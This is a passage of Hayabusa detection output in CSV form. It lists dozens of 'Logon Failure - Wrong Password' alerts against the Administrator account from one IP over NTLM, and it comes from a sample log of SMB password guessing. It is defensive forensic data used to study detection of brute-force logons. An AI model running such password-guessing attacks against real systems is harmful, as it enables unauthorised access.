01:50:28.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: z9o4f1XvvcVXBNwL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IjCR48ZJFyEhzrYI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.556 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mUV9i4O2gapcC01d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XJzGAMQCvJBFOUPq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fyyu0x6I29R2J10Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.687 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8lCe1shqSs0xNwAJ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ipZAMvm56d5mE9Fc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XX9N7jodTuEYBCSE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.814 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h5DBFGpzfJJ7gYV1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fQ3qTwcWkXJDuXDI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TOfkvLSo2HuhMtvk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:28.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y9DQUhPQHvvwAO0C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.990 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yao1JM0tSFv5IHnL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NXGm63wiZz3ZYFb9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.077 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: izvPgZCO2GRVLhId : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.119 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iI9zO2o7jd922pfK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UnAGy86My6hVwt4J : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HhFTzONSVEziRtgq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.251 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QdEv4ooC8AApqU1T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TxFGRBKVK732Aeu4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ITg8QH90LKkAQMLL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.377 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E8YKCN2uxmJtYxdW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:29.411 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lcVIqrTQbNLFW7Cr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.449 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: taZx68l1ci0i2XB0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.487 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Jjy0gZhZCc9dVGd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S1DxOWcNytmxHfxl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.555 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JGRFWos3MJeQ0oAr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.593 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I3YXVTiQAGbf57TH : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eWNsBwoGd36krY2U : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HIobpWCoOHdD76lL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W91ruUEdXwRcMxVB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.743 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6PEs7fp97cYFf4vx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.781 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hQelUX0kwLfpJnr0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:29.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t88CBspQqbiO1IPc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.864 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zELW2Upo3jRCIqJk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.900 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QfcyJGLYmu93JBIL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3t2nKPZHZvcXM3QA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.980 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oiDRonqdEM2YJvz9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wJPF4GUypkDkTz56 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cd5YRVIoXx8LoYpK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.106 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H49I2Xp2Gz1Jj0Wh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.143 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZMSWWzskoRfYBGny : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.190 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GLm2PolKMBsYkPnN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2ZjHWhG2rXzYWskz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:30.325 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FOZzVedHYODB5Yvd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xVaRybjI4HdZV0Zs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.411 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tTcl30MvvycjFcQb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.449 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fVZqbCr9EwmV4gNE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zVwhii0TVmCkpDI0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Tx04CPPVa6WYY9G : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gHyefIGqhIIy3ZI9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.627 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wrietoh4wgXcEvNd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9WW0Y5PW2JfCCdyR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tmXsMJ0ELK4qiNY6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yeftUqriSoxCgmDy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:30.769 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 60JE9WQQ8N00j65B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r0rt2yVAEH6V4IIS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pay98C2Gr1di7qQd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.881 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8TyPDYm9QCAmqj7h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Dw3iK7DQMVXy8LW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.977 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BMuO0QEkxpKRv4Vl : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RaHECaQDXCXQc9Xw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ewXT2VcARiaNLIxJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dGSTrm4AOojs7So0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wVTBSk0Q65LkaTqg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NjFN51w3T4VwuWa5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:31.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KG7a88h48ZEyOuYw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6ksKuTSGukc5em3B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tPEMcGV6ZR92sWNY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iBQ6sKrRjb7BsySN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gDFnG1gv7jOeIQ0t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.454 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QdFKkcNpkfAScnkp : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.511 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IAYbV4ioewwkZSmy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1bQ2Dxd6nlgSXJpo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: havLyoVCfdCqzrqO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 